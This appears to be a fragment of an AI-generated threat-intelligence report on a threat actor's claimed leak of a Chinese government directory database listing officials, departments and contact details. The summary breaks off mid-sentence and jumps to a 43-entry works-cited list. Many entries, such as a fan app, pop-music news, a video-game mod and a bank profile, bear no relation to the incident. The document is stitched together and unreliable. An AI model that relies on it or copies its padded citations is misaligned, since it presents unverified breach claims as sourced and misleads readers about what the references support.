• Incident Summary & Initial Impact: The threat actor claims to have leaked the database of Directory of Government in China. The compromised data contains government leadership profiles, department structures, and contact details. It also includes national laws, policies, and official announcements. Additionally, it holds economic statistics, public service information, and records of diplomatic activities and anti-corruption efforts.
• Affected Entity Context: The Directory of Government in China refers to the structure and information of the Chinese government. The Chinese government is a Leninist “

Works cited

1. JKT48 Showroom Fanmade – Apps on Google Play, accessed June 6, 2025, https://play.google.com/store/apps/datasafety?id=com.inzoid.jkt48showroom
2. Leviathan: Threat Actor Profile – Cyble, accessed June 6, 2025, https://cyble.com/threat-actor-profiles/leviathan/
3. Dinas PUBMTR Sumatera Selatan, accessed June 6, 2025, https://dpubmtr.sumselprov.go.id/
4. Analyzing DEEP#DRIVE: North Korean Threat Actors Observed …, accessed June 6, 2025, https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/
5. BlackMatter Ransomware | CISA, accessed June 6, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-291a
6. BlackMatter Ransomware: In-Depth Analysis & Recommendations …, accessed June 6, 2025, https://www.varonis.com/blog/blackmatter-ransomware
7. What are the Types of Cyber Threat Actors? – Sophos, accessed June 6, 2025, https://www.sophos.com/en-us/cybersecurity-explained/threat-actors
8. Top 5 Underground Hacker Forums That are Accessible via Your Web Browsers such as Google Chrome, Firefox, and Internet Explorer – SOCRadar® Cyber Intelligence Inc., accessed June 6, 2025, https://socradar.io/top-5-underground-hacker-forums-that-are-accessible-via-your-web-browsers-such-as-google-chrome-firefox-and-internet-explorer/
9. Bolt (company) – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Bolt_(company)
10. Peoples Cyber Army Of Russia | Threat Actor Profile | Cyble, accessed June 6, 2025, https://cyble.com/threat-actor-profiles/peoples-cyber-army-of-russia/
11. How World Travel Created The Liberty City Preservation Project : r/Games – Reddit, accessed June 6, 2025, https://www.reddit.com/r/Games/comments/1hsol2j/how_world_travel_created_the_liberty_city/
12. Cyber scammer steals $98K from 82-year-old woman who is now homeless, accessed June 6, 2025, https://www.local10.com/news/local/2022/05/20/cyber-scammer-steals-98k-from-82-year-old-woman-who-is-now-homeless/
13. A Major Terror Plot Interrupted — or a ‘Setup’? – PBS, accessed June 6, 2025, https://www.pbs.org/wgbh/frontline/article/video-liberty-city-seven-terror-plot-setup-in-the-shadow-of-911/
14. Black Basta-like Microsoft Teams phishing leads to novel backdoor | SC Media, accessed June 6, 2025, https://www.scworld.com/news/black-basta-like-microsoft-teams-phishing-leads-to-novel-backdoor
15. Grand Theft Auto: Liberty City Stories – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Grand_Theft_Auto:_Liberty_City_Stories
16. Rockstar Games has seemingly shut down the Liberty City Preservation Project mod for GTA 5. : r/pcgaming – Reddit, accessed June 6, 2025, https://www.reddit.com/r/pcgaming/comments/1i29413/rockstar_games_has_seemingly_shut_down_the/
17. What is a Cyber Threat Actor? | CrowdStrike, accessed June 6, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
18. Uruguay – U.S. Department of Labor, accessed June 6, 2025, https://www.dol.gov/sites/dolgov/files/ILAB/child_labor_reports/tda2015/uruguay.pdf
19. E_Libro_abril_2012 – Biblioteca Universidad de Sevilla, accessed June 6, 2025, https://bib.us.es/Soporte-news/common/elibro_altas_abril_2012.xls
20. Russia-aligned hackers target Tajikistan in new espionage campaign, accessed June 6, 2025, https://therecord.media/russia-hackers-target-tajikistan-espionage
21. Organization Info – Ministry of Finance – Thailand, accessed June 6, 2025, http://www2.mof.go.th/accessibility/www2government_agencies.html
22. Mariah Carey unveils ‘Type Dangerous’ – listen and see the lyrics – Entertainment Focus, accessed June 6, 2025, https://entertainment-focus.com/2025/06/06/mariah-carey-unveils-type-dangerous-listen-and-see-the-lyrics/
23. Walter Presents: ‘Detective Surprenant’ season 1 arrives on C4 Streaming in July, accessed June 6, 2025, https://entertainment-focus.com/2025/05/31/walter-presents-detective-surprenant-season-1-arrives-on-c4-streaming-in-july/
24. ToyMaker Uses LAGTOY to Sell Access to CACTUS Ransomware Gangs for Double Extortion – The Hacker News, accessed June 6, 2025, https://thehackernews.com/2025/04/toymaker-uses-lagtoy-to-sell-access-to.html
25. CTI Roundup: Deepfakes, ToyMaker IAB, and ClickFix | Tanium, accessed June 6, 2025, https://www.tanium.com/blog/cti-roundup-deepfakes-toymaker-iab-clickfix/
26. company-background – KASIKORNBANK, accessed June 6, 2025, https://www.kasikornbank.com/en/about/pages/company-background.aspx
27. Tactics and Motivations of Modern Hacktivists – CYFIRMA, accessed June 6, 2025, https://www.cyfirma.com/research/tactics-and-motivations-of-modern-hacktivists/
28. Warning: Cyber attacks have been used to create hatred against …, accessed June 6, 2025, https://blog.cofact.org/warning-cyber-attacks-have-been-used-to-create-hatred-against-cambodians/
29. Exploring Online Structures on Chinese Government Portals – ResearchGate, accessed June 6, 2025, https://www.researchgate.net/publication/228256126_Exploring_Online_Structures_on_Chinese_Government_Portals_Citizen_Political_Participation_and_Government_Legitimation
30. Study of the service functions of health facilities in Yogyakarta Special Province – E3S Web of Conferences, accessed June 6, 2025, https://www.e3s-conferences.org/articles/e3sconf/pdf/2021/101/e3sconf_icst2021_07006.pdf
31. China-Linked APT Aquatic Panda: 10-Month Campaign, 7 Global …, accessed June 6, 2025, https://thehackernews.com/2025/03/china-linked-apt-aquatic-panda-10-month.html
32. What the 2025 SASI Report reveals – Kaseya, accessed June 6, 2025, https://www.kaseya.com/?post_type=post&p=23670
33. FBI and European partners seize major malware network in blow to global cybercrime, accessed June 6, 2025, https://apnews.com/article/cybercrime-malware-fbi-takdown-ce415e9ea0f11d31e6cf3e401a264d3c
34. Authorities arrest man allegedly running ‘likely world’s largest ever’ cybercrime botnet, accessed June 6, 2025, https://apnews.com/article/botnet-cybercrime-pandemic-fraud-malware-identity-theft-online-fraud-32ac98b96b53e8d293d1e8c552a1d8f1
35. National Cyber Investigative Joint Task Force – FBI, accessed June 6, 2025, https://www.fbi.gov/investigate/cyber/national-cyber-investigative-joint-task-force
36. What is the Dark Web? How to access it – Kaspersky, accessed June 6, 2025, https://www.kaspersky.com/resource-center/threats/deep-web
37. How was this dark web user caught? : r/TOR – Reddit, accessed June 6, 2025, https://www.reddit.com/r/TOR/comments/1jzzzwc/how_was_this_dark_web_user_caught/
38. Hack Forums – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Hack_Forums
39. Microsoft and CrowdStrike Launch Shared Threat Actor Glossary to Cut Attribution Confusion – The Hacker News, accessed June 6, 2025, https://thehackernews.com/2025/06/microsoft-and-crowdstrike-launch-shared.html
40. Anonymous Investigator Exposed Entire Conti Ransomware Gang Group Photos and Location – Cyber Press, accessed June 6, 2025, https://cyberpress.org/anonymous-investigator-exposed-entire-conti-ransomware/
41. Top 10 Dark Web Forums Dominating Cybercrime – Threat Intelligence Lab, accessed June 6, 2025, https://threatintelligencelab.com/blog/top-10-dark-web-forums-dominating-cybercrime/
42. Alexander Vinnik – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Alexander_Vinnik
43. BlackSuit Ransomware Group: What Have Changed After Royal …, accessed June 6, 2025, https://www.picussecurity.com/resource/blog/blacksuit-ransomware-group